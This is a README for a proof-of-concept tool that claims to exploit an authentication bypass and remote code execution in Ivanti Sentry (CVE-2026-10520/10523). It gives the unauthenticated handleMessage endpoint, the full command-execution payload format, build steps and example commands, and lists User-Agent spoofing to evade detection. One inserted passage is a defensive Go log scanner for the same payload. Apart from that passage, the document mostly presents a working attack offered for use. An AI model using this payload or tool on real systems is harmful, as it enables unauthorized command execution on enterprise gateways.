CVE-2026-10523 - Ivanti Sentry RCE Detection Tool

A comprehensive proof-of-concept detection tool for testing Ivanti Sentry vulnerabilities related to authentication bypass and remote code execution. This tool identifies systems vulnerable to CVE-2026-10520 and CVE-2026-10523.

Overview

This project is designed to detect and validate whether an Ivanti Sentry instance is vulnerable to critical authentication bypass and remote code execution flaws. The tool sends specially crafted messages through the Ivanti Sentry API endpoint to execute system commands and extract the results, allowing security researchers and penetration testers to identify vulnerable deployments.

Vulnerability Details

CVE-2026-10520

Authentication bypass vulnerability in Ivanti Sentry that allows unauthenticated access to restricted API endpoints.

CVE-2026-10523

Remote code execution vulnerability in Ivanti Sentry that permits execution of arbitrary system commands through the messaging API when combined with the authentication bypass.

Features

  • Unauthenticated detection of vulnerable Ivanti Sentry instances
  • System command execution capability for proof-of-concept validation
  • Support for HTTP and HTTPS connections with TLS verification bypass
  • Proxy support for testing through intermediaries
  • Clean command output extraction from XML responses
  • Safe error handling with informative feedback
  • Configurable timeout and response size limits

Requirements

  • Go 1.26.4 or higher
  • Network access to the target Ivanti Sentry instance
  • Valid target URL with protocol (HTTP or HTTPS)

Installation

Clone the repository and navigate to the project directory:

git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Initialize the Go module and download the dependencies:

go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Build the executable:

go build -o tot_poc tot_poc.go

Usage

The tool requires two mandatory parameters: target URL and command to execute.

Basic Usage

Run a simple command on the target:

./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Command Line Options

  • -url (required): Target base URL including protocol (e.g., https://127.0.0.1:8443)
  • -cmd (required): Command to execute for vulnerability detection (e.g., "uname -a", "id", "whoami")
  • -p or -proxy (optional): Proxy address and port for routing traffic (e.g., 127.0.0.1:8080)

Usage Examples

Detect vulnerability with simple system information command:

./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Run with proxy configuration:

./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Execute command to extract system information:

./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Output

The tool will display:

  1. A banner with vulnerability information
  2. Target URL, command, and proxy configuration (if applicable)
  3. Real-time status messages indicating request progress
  4. Results of the command execution if the target is vulnerable
  5. Error messages if the target is not vulnerable or connection fails

Successful Detection Output

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Failed Detection Output

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

Technical Details

Attack Vector

The tool exploits the /mics/api/v2/sentry/mics-config/handleMessage endpoint, which is accessible without authentication. The payload is constructed as:

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

The response contains the command output in XML format within a success tag.
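
On the defending side, the endpoint path and message format above are the indicators to search for in request logs. The following Go program is an added example, not code from this repository: it scans request records and reports POSTs to the endpoint whose body carries the commandexec message, together with the requested command. The record layout (time|source|method|path|body, as a reverse proxy that logs request bodies might produce), the sample lines and all function names are assumptions of this example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Endpoint path and message marker as given in the "Attack Vector" section.
const endpoint = "/mics/api/v2/sentry/mics-config/handleMessage"
const marker = "/configuration/system/commandexec"

var reqAndRes = regexp.MustCompile(`(?s)<reqandres>(.*?)</reqandres>`)

// Constructed sample records; the "time|source|method|path|body" layout is assumed.
var sampleLog = []string{
	"2026-01-01T10:00:00Z|203.0.113.7|POST|" + endpoint + "|message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Euname+-a%3C%2Freqandres%3E%3C%2Fcommandexec%3E",
	"2026-01-01T10:00:05Z|198.51.100.4|GET|/index.html|-",
	"2026-01-01T10:01:00Z|203.0.113.7|POST|" + endpoint + "|message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>id</reqandres></commandexec>",
	"2026-01-01T10:02:00Z|192.0.2.10|POST|" + endpoint + "|message=status",
}

type Finding struct{ Time, Source, Command string } // one flagged request

// scan flags POSTs to the endpoint whose form body, once URL-decoded,
// contains the commandexec marker and a <reqandres> element.
func scan(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		f := strings.SplitN(line, "|", 5) // body is last, so it may contain '|'
		if len(f) != 5 || f[2] != "POST" || strings.SplitN(f[3], "?", 2)[0] != endpoint {
			continue
		}
		body, err := url.QueryUnescape(f[4])
		if err != nil {
			body = strings.ReplaceAll(f[4], "+", " ") // malformed escapes: match the raw body
		}
		if m := reqAndRes.FindStringSubmatch(body); m != nil && strings.Contains(body, marker) {
			out = append(out, Finding{f[0], f[1], m[1]})
		}
	}
	return out
}

func main() { fmt.Printf("%+v\n", scan(sampleLog)) }
```

The match keys on path and body only; the User-Agent is ignored because the tool, by its own description, spoofs it.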

Security Features

  • TLS verification bypass for testing self-signed certificates
  • Configurable HTTP timeouts to prevent hanging requests
  • Response size limiting (10 MB) to prevent memory exhaustion
  • Proper error handling for malformed responses
  • User-Agent spoofing to avoid simple detection mechanisms

How It Works

  1. Parse command-line arguments for target URL and command
  2. Create HTTP client with optional proxy configuration
  3. Construct payload with the user-provided command
  4. Send POST request to the vulnerable endpoint
  5. Extract command output from XML response structure
  6. Display results or error messages accordingly

Disclaimer

This tool is provided for authorized security testing and research purposes only. Users are solely responsible for ensuring they have proper authorization before testing any systems. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse or damage caused by this tool.

Requirements and Limitations

  • Target must be a vulnerable Ivanti Sentry instance
  • Network connectivity to the target system is required
  • Default timeout is 10 seconds per request
  • Maximum response size is limited to 10 MB
  • Only effective on systems running vulnerable versions of Ivanti Sentry
  • TLS certificate validation is disabled for testing purposes

Author

GhostGTR666 - Gagaltotal666

Repository

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

License

This project is provided as-is for security research and educational purposes.

References

  • CVE-2026-10520: Ivanti Sentry Authentication Bypass
  • CVE-2026-10523: Ivanti Sentry Remote Code Execution
